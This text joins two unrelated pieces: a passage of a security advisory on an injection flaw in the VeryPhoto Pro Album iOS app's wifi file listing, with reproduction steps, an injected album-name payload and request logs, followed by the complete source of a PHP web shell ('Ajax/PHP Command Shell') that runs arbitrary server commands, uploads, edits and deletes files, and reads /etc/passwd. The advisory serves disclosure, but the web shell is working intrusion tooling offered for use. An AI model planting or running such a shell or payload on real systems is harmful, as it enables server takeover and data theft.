the command occurs in the `VeryPhoto - File Dir Index Listing` of the http wifi interface application. Attackers are able to manipulate the local albumname values by of the iOS default photo app by rename to execute the commands. The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. Local attackers are also able to exploit the albumname validation issue in combination with persistent injected script codes. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application and the connected device components. Request Method(s): [+] [Sync] Vulnerable Module(s): [+] Album Vulnerable Parameter(s): [+] albumname Affected Module(s): [+] VeryPhoto - File Dir Index Listing (http://localhost:8080/) Proof of Concept (PoC): ======================= The local command inject web vulnerability can be exploited by local attackers (network) without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the VeryPhoto Pro Album v3.0 iOS application (https://itunes.apple.com/de/app/veryphoto-pro-album-password/id720810114) 2. Open in the device menu the default photo album app of apple (iphone/ipad) 3. Add a new album and change the name to local command that should be injected 4. Save the settings and open the VeryPhoto Pro Album application 5. Start the Wifi service 6. Surf with a local network device to the local web-server (localhost:8080) Note: The execution of the command inject occurs after the wifi interface index has been visited. The vulnerable value that executes the command is the albumname. 7. Successful reproduce of the local command inject web vulnerability! PoC: Albumname - File Dir Index </script><tr><td height="170" width="150"><p align="center"> <img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[LOCAL COMMAND INJECTION VULNERABILITY!]img%20src=%5C%22x%5C%22%3E%2520%3Ciframe%20src=a%3E%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22 assets-library://group/?id=7BADE58E-C286-43D8-8CE2-4415C4DF35CA&filter=1537%22,%22numberOfImage%22:%220%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"> <img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22, %22numberOfImage%22:%223%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"> <p align="center"><img src="getCoverImage?%7B%22name%22:%22My%20Photo%20Stream%22,%22type%22:%222%22,%22groupType%22:32,%22url%22:%22 assets-library://group/?id=F8476D51-E4C9-4A2A-948B-2D577719B9C7&filter=1537%22,%22numberOfImage%22:%220%22%7D" onclick="albumClick('2')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font size="2" face="Courier New">"><img src="x">%20<iframe src="a">>(0)</font></td><td height="20" width="50"></td> <td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(3)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">My Photo Stream(0)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr> </table> </div> --- PoC Session Logs [GET] (Execution) --- Status: 200[OK] GET http://192.168.2.104:8080/getCoverImage?%7B%22name%22:%22%5C%22%3E%3Cimg%20src=%5C%22x%5C%22%3E%2520%3Ciframe%20src=a%3E%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=7BADE58E-C286-43D8-8CE2-4415C4DF35CA&filter=1537%22,%22numberOfImage%22:%220%22%7D Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[3813] Mime Type[image/x-jpg] Request Header: Host[192.168.2.104:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://192.168.2.104:8080/] Connection[keep-alive] Cache-Control[max-age=0] Response Header: Accept-Charset[utf-8] Content-Length[3813] Content-Type[image/x-jpg] Connection[close] - Response Status: OK[200] GET http://192.168.2.104:8080/x[LOCAL COMMAND INJECTION VULNERABILITY!] Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[unknown] Mime Type[unknown] Request Header: Host[192.168.2.104:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://192.168.2.104:8080/] Reference(s): http://localhost:8080/x http://localhost:8080/getCoverImage Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure encode and parse of the vulnerable `albumname` value. Restrict the albumname value and disallow special charsi to prevent application-side injection attacks. Encode in the file dir index listing the vulnerable output value to prevent the execution of local commands. Security Risk: ============== The security risk of the local command inject web vulnerability in the albumname is estimated as medium. (CVSS 5.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Source
-
~# shellhelp Ajax/PHP Command Shell © By Ironfist Version 0.7B The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you're not used to these commands, google a little. Custom Functions If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains 'func name' => 'javascript function'. Take a look at the built-in functions for examples. I know this readme isn't providing too much information, but hell, does this shell even require one - Iron <?php session_start(); error_reporting(0); $password = "password"; //Change this to your password $version = "0.7B"; $functions = array('Clear Screen' => 'ClearScreen()', 'Clear History' => 'ClearHistory()', 'Can I function?' => "runcommand('canirun','GET')", 'Get server info' => "runcommand('showinfo','GET')", 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 'Running processes' => "runcommand('ps -aux','GET')", 'Readme' => "runcommand('shellhelp','GET')" ); $thisfile = basename(__FILE__); $style = '<style type="text/css"> .cmdthing { border-top-width: 0px; font-weight: bold; border-left-width: 0px; font-size: 10px; border-left-color: #000000; background: #000000; border-bottom-width: 0px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #008000; font-family: verdana; border-right-width: 0px; border-right-color: #000000; } input,textarea { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #FFFFFF; background: #000000; border-bottom-width: 1px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #FFFFFF; font-family: verdana; border-right-width: 1px; border-right-color: #FFFFFF; } A:hover { text-decoration: none; } table,td,div { border-collapse: collapse; border: 1px solid #FFFFFF; } body { color: #FFFFFF; font-family: verdana; } </style>'; $sess = __FILE__.$password; if(isset($_POST['p4ssw0rD'])) { if($_POST['p4ssw0rD'] == $password) { $_SESSION[$sess] = $_POST['p4ssw0rD']; } else { die("Wrong password"); } } if($_SESSION[$sess] == $password) { if(isset($_SESSION['workdir'])) { if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) { chdir($_SESSION['workdir']); } } if(isset($_FILES['uploadedfile']['name'])) { $target_path = "./"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { } } if(isset($_GET['runcmd'])) { $cmd = $_GET['runcmd']; print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>"; if($cmd == "") { print "Empty Command..type \"shellhelp\" for some ehh...help"; } elseif($cmd == "upload") { print '<br>Uploading to: '.realpath("."); if(is_writable(realpath("."))) { print "<br><b>I can write to this directory</b>"; } else { print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>"; } } elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) { if(file_exists($file[1]) && is_dir($file[1])) { chdir($file[1]); $_SESSION['workdir'] = $file[1]; print "Current directory changed to ".$file[1]; } else { print "Directory not found"; } } elseif(strtolower($cmd) == "shellhelp") { print '<b><font size=7>Ajax/PHP Command Shell</b></font> © By Ironfist The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re not used to these commands, google a little. <b>Custom Functions</b> If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains \'func name\' => \'javascript function\'. Take a look at the built-in functions for examples. I know this readme isn\'t providing too much information, but hell, does this shell even require one - Iron '; } elseif(ereg("editfile (.*)",$cmd,$file)) { if(file_exists($file[1]) && !is_dir($file[1])) { print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">"; $contents = file($file[1]); foreach($contents as $line) { print htmlspecialchars($line); } print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } else { print "File not found."; } } elseif(ereg("deletefile (.*)",$cmd,$file)) { if(is_dir($file[1])) { if(rmdir($file[1])) { print "Directory succesfully deleted."; } else { print "Couldn't delete directory!"; } } else { if(unlink($file[1])) { print "File succesfully deleted."; } else { print "Couldn't delete file!"; } } } elseif(strtolower($cmd) == "canirun") { print "If any of these functions is Enabled, the shell will function like it should.<br>"; if(function_exists(passthru)) { print "Passthru: <b><font color=green>Enabled</b></font><br>"; } else { print "Passthru: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(exec)) { print "Exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Exec: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(system)) { print "System: <b><font color=green>Enabled</b></font><br>"; } else { print "System: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(shell_exec)) { print "Shell_exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Shell_exec: <b><font color=red>Disabled</b></font><br>"; } print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>"; if( ini_get('safe_mode') ){ print "Safe Mode: <b><font color=red>Enabled</b></font>"; } else { print "Safe Mode: <b><font color=green>Disabled</b></font>"; } print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>"; if( ini_get('open_basedir') ){ print "Open_basedir: <b><font color=red>Enabled</b></font>"; } else { print "Open_basedir: <b><font color=green>Disabled</b></font>"; } } //About the shell elseif(ereg("listdir (.*)",$cmd,$directory)) { if(!file_exists($directory[1])) { die("Directory not found"); } //Some variables chdir($directory[1]); $i = 0; $f = 0; $dirs = ""; $filez = ""; if(!ereg("/$",$directory[1])) //Does it end with a slash? { $directory[1] .= "/"; //If not, add one } print "Listing directory: ".$directory[1]."<br>"; print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>"; if ($handle = opendir($directory[1])) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $dirs[$i] = $file; $i++; } else { $filez[$f] = $file; $f++; } } print "<td>"; foreach($dirs as $directory) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>"; } print "</td><td>"; foreach($filez as $file) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>"; } print "</td></table>"; } } elseif(strtolower($cmd) == "about") { print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version"; } //Show info elseif(strtolower($cmd) == "showinfo") { if(function_exists(disk_free_space)) { $free = disk_free_space("/") / 1000000; } else { $free = "N/A"; } if(function_exists(disk_total_space)) { $total = trim(disk_total_space("/") / 1000000); } else { $total = "N/A"; } $path = realpath ("."); print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>"; if(function_exists(passthru)) { passthru("uname -a"); } else { print "Passthru is disabled :("; } } //Read /etc/passwd elseif(strtolower($cmd) == "etcpasswdfile") { $pw = file('/etc/passwd/'); foreach($pw as $line) { print $line; } } //Execute any other command else { if(function_exists(passthru)) { passthru($cmd); } else { if(function_exists(exec)) { exec("ls -la",$result); foreach($result as $output) { print $output."<br>"; } } else { if(function_exists(system)) { system($cmd); } else { if(function_exists(shell_exec)) { print shell_exec($cmd); } else { print "Sorry, none of the command functions works."; } } } } } } elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) { $file = $_POST['filetosave']; if(!is_writable($file)) { if(!chmod($file, 0777)) { die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message } } $fh = fopen($file, 'w'); $dt = $_POST['filecontent']; fwrite($fh, $dt); fclose($fh); } else { ?> <html> <title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title> <head> <?php print $style; ?> <SCRIPT TYPE="text/javascript"> function sf(){document.cmdform.command.focus();} var outputcmd = ""; var cmdhistory = ""; function ClearScreen() { outputcmd = ""; document.getElementById('output').innerHTML = outputcmd; } function ClearHistory() { cmdhistory = ""; document.getElementById('history').innerHTML = cmdhistory; } function deletefile(file) { deleteit = window.confirm("Are you sure you want to delete\n"+file+"?"); if(deleteit) { runcommand('deletefile ' + file,'GET'); } } var http_request = false; function makePOSTRequest(url, parameters) { http_request = false; if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function SaveFile() { var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) + "&filecontent=" + encodeURI( document.getElementById("area1").value ); makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr); document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly."; } function runcommand(urltoopen,action,contenttosend){ cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory; document.getElementById('history').innerHTML = cmdhistory; if(urltoopen == "clear") { ClearScreen(); } var ajaxRequest; try{ ajaxRequest = new XMLHttpRequest(); } catch (e){ try{ ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try{ ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ alert("Wicked error, nothing we can do about it..."); return false; } } } ajaxRequest.onreadystatechange = function(){ if(ajaxRequest.readyState == 4){ outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>"; document.getElementById('output').innerHTML = outputcmd; var objDiv = document.getElementById("output"); objDiv.scrollTop = objDiv.scrollHeight; } } ajaxRequest.open(action, "?runcmd="+urltoopen , true); if(action == "GET") { ajaxRequest.send(null); } document.cmdform.command.value=''; return false; } function set_tab_html(newhtml) { document.getElementById('commandtab').innerHTML = newhtml; } function set_tab(newtab) { if(newtab == "cmd") { newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>'; } else if(newtab == "upload") { runcommand('upload','GET'); newhtml = '<font size=0><b>This will reload the page... </b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>'; } else if(newtab == "workingdir") { <?php $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\""; $pathparts = explode("/",realpath (".")); foreach($pathparts as $folder) { $folders .= $folder."/"; } $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>"; ?> newhtml = '<?php print $folders; ?>'; } else if(newtab == "filebrowser") { newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory'; runcommand('listdir .','GET'); } else if(newtab == "createfile") { newhtml = '<b>File Editor, under construction.</b>'; document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } document.getElementById('commandtab').innerHTML = newhtml; } </script> </head> <body bgcolor=black onload="sf();" vlink=white alink=white link=white> <table border=1 width=100% height=100%> <td width=15% valign=top> <form name="extras"><br> <center><b>Quick Commands</b><br> <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'> <?php foreach($functions as $name => $execute) { print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>'; } ?> </center> </div> </form> <center><b>Command history</b><br></center> <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div> <br> <center><b>About</b><br></center> <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'> <br> <b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist <br> Version <?php print $version; ?> <br> <br> <br>Thanks to everyone @ <a href="http://www.ironwarez.info" target=_blank>SharePlaza</a> <br> <a href="http://www.milw0rm.com" target=_blank>milw0rm</a> <br> and special greetings to everyone in rootshell </div> </td> <td width=70%> <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0> <b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> <b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> <b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> </font></td> <tr> <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div> <tr> <td height=1% width=100% valign=top> <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'> <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');"> <b>Command</b>: <input type=text name=command class=cmdthing size=100%><br> </form> </div> </td> </table> </td> </table> </body> </html> <?php } } else { print "<center><table border=0 height=100%> <td valign=middle> <form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\"> </form>"; } ?>